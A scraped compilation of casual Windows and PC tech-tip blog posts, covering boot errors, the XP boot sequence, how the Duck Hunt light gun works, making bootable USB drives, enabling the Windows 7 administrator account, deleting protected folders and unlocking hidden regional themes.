      work devices are started from cards plugged into the front of the machine. So, if one of these devices fail, the same message, "Insert bootable media," will display on the booting screen of whatever machine is attempting to start. If the hard drive loses its partition information, this is one of the scenarios leading to this message. If the files used for startup are corrupted in any way, this is another reason for the message. The way of correcting this is to complete the system startup with an alternative boot device (See Resources), and, once booted, search for reasons why the system failed to boot from the normal boot device (in most cases the hard drive). Some of these resources also have tools to rescue booting files that are missing or bad. Another reason could be that the user left a disk in a drive and the machine is set (in the BIOS) to boot from that media first. This could be a floppy disk or a CD/DVD ROM. And the reason it does not work is because the floppy or CD/DVD does not contain a boot record. The simple remedy is to remove the floppy, CD or DVD and start again.

    How Windows XP Loads Itself

    • NTLDR is the loader for the Windows NT operating system. After it has accessed the file system, which can either be NTFS or FAT32, it looks for the presence of a file called HIBERFIL.SYS which is used if the user hibernated the PC. If so, NTLDR loads from HIBERFIL.SYS and the system comes back up from where it left off at the end of the previous session. Otherwise, it looks directly at BOOT.INI for information where to boot (including non-Windows NT operating systems like Linux or MS-DOS). Next, if a Windows NT operating system is selected, it runs NTDETECT.COM, which loads information about the hardware. Finally, it passes control to NTOSKRNL.EXE, sending to it the information returned by NTDETECT.COM.

    Non-Booting Scenarios and Ways to Avoid Them

    • There are other reasons why a machine will not boot. One of them is a corrupted system registry. This will generally not give the same error message. However, a direct reason for corrupted system startup files is the lack of space on the primary hard drive. So it is a good idea not to let the hard drive's free space fall below 25 percent. Another reason would be the beginning of failure of the hard drive's physical sectors, causing a failure of the system files needed to boot the drive. Missing any of the critical files required to boot Windows is like having a missing piece of a jigsaw puzzle.

Ever Imagined How the Gun works in Duck Hunt to shoot a Duck.. as, if you open the Gun it looks empty from inside

Many Video Games like Play station 1 etc , uses a gun to play a game like duck hunt etc . Ever imagined how the gun works and duck dies .


Actually , gun barrel contains a photo diode (or  photo transistor) . which is able to sense light coming from the TV screen. Gun also have a trigger switch. The output of the photo diode and switch are fed to the computer (play station ) controlling the game.

Simultaneously,  computer is receiving signals from the screen driver electronics. As you know in a Television ,the horizontal retrace & vertical retrace signals are used to align the picture on the screen. The screen driver electronics send pulses to the computer at the start of the horizontal and vertical retrace signals, by this the computer knows where on the screen the electron beam is located during each frame.

The gaming device normally uses one of two different techniques to find out whether the gun is pointed at the target when the user pulls the trigger or not .

    The computer blanks the screen &  paints just the target object white. If the photo diode senses darkness after one vertical retrace signal and then light after the next, the computer assumes that the gun is pointed at the target and scores a hit.

    The computer blanks the screen and then paints the entire screen white. It takes time for the electron beam to trace the entire screen while painting it white. On comparing the signal coming from the photo diode with the horizontal and vertical retrace signals, the computer detects where the electron beam is on the screen when the photo diode first senses its light. The computer counts the number of microseconds that pass between the time the horizontal and vertical retrace signals start and the time the photo diode first senses light. The number of microseconds tells the computer exactly where on the screen the gun is pointing. If the calculated position and the position of the target match, the computer scores a hit.


Source : http://www.howstuffworks.com/question273.htm

How to make a Pendrive Bootble / Installing an Operating System ( Windows / Linux ) from Pendrive

What Does Booting Means / Booting Process / How a Pc Starts or Operating System loads


1. For installing Windows or Linux using Software if you hav iso image .
  1. Download the iso of your operating system .
  2. Now download the software Universal Usb Installer.. Click Here .

3. Click on I agree ,then select your Distribution .
4. Browse to path where your iso is present .
5. Select your Usb drive and click create and it will create a bootable pendrive and boot using Pendrive and install your OS .


2 Installing Windows from pendrive if you have Setup files and not iso or you can extract the iso .


1.Now go to the Windows setup files and go to boot folder and copy bootsect.exe to your c:
2.Now copy the whole operating system instalation files on your pendrive .(Your pendrive must be Fat32 formatted)
3.Now go to run , type cmd
4.Now type cd .. and cd.. untill you reach C :/
5 Exexute command bootsect.exe /nt60 I:
6.Where I is the path of your pendrive .
7. Now boot through pendrive and install OS .
8.The syslinux tool will create a hidden system file named bootmgr on the Flash and make the drive bootable


3. Installing or running Live Linux from pendrive if you have Setup files and not iso or you can extract the iso .


1.You need to download syslinuxnew.exe from here .
2. Copy the syslinux.exe in to your C:/
3. Extract the iso and place the files in pendrive . ( Formatted in Fat32)
4. Now if any folder with name isolinux exists then rename it to syslinux and in that folder there will be a file isolinux.cfg rename it to syslinux.cfg
5. Now go to run , type cmd and enter
6. Go to your C:/ using " cd .. " command
7. Now run this command without quotes " syslinuxnew.exe -ma I:/ "  ( here I:/ is the drive letter of your pendrive )
8. Now you can restart and boot via your pendrive .
9.The syslinux tool will create a hidden system file named ldlinux.sys on the Flash and make the drive bootable









Enable Administrator Account In Windows 7

1. Go to start and type cmd and right click on it and run as adminstrator .




2. Now type  " net user administrator active:yes "   without quotes
3 This will enable the administrator account which is super user .
4 Now reboot your system and you will see one more account on the login screen , just login in it and you will have all the privelleges .

5. If it is password protected , you can break the password . (Know how to break the password in windows ) 




...............

Deleting files that need administrator privelleges

1. Well you need to login as an administrator for that .
(Know how to login as administrator)



2 .Or you can use command prompt .


Let us suppose you need to delete Windows old folder in C: drive .

1 Click on Windows start button in taskbar .
2 Now in the box type cmd , you will see cmd.exe
3 Right click over it and run as administrator .



4 Now browse to your C:/ by using "cd .. " without quotes
5 now type  del /F /A "Windows old"   (after typing W of windows old press tab twice or more , you will see windows old folder ) and enter .
6 Then it will ask are you sure press y and enter .




















7 It will delete all the files from windows old folder .


3 .OR you can use security tab ...


1. Right click on the Windows Old folder and go to propeties .
2 Now click on security tab and click on Edit
3 Select Administrator and Below in Permissions Box , Tick on Full Control and OK .
4 Now you can delete that folder .































...............

Enable Hidden Themes In Windows 7

1. Open Windows Explorer and click Organize






2. Select Folder and Search Options and navigate to the View tab.






3. Select Show hidden files, folders and drivers and uncheck Hide protected operating system files (Recommended). Click Yes, if prompted for confirmation.

4. Click OK and now browse to the folder: C:\Windows\Globalization\MCT

5. There are five folders here with the name with format MCT-XX (where XX is AU, CA, GB, US, or ZA) which represents globalization settings for each region. Go into the folder that you want to activate its theme.
Note that AU, CA and ZA regions have the same themes.

6. Open the Theme folder inside the selected region folder.

7. Double click on the XX.theme (eg AU.theme) file to apply the theme to the Windows 7 desktop system. Once a theme is executed and activated, the theme will be available and saved into Personalization options, so that user can select this theme directly from the personalization settings.
(Right click on Desktop and click Personalize to go to personalization settings)

8. Now to go to Folder Options to reverse the first 5 steps to hide the hidden and protected system files and folders again.
...............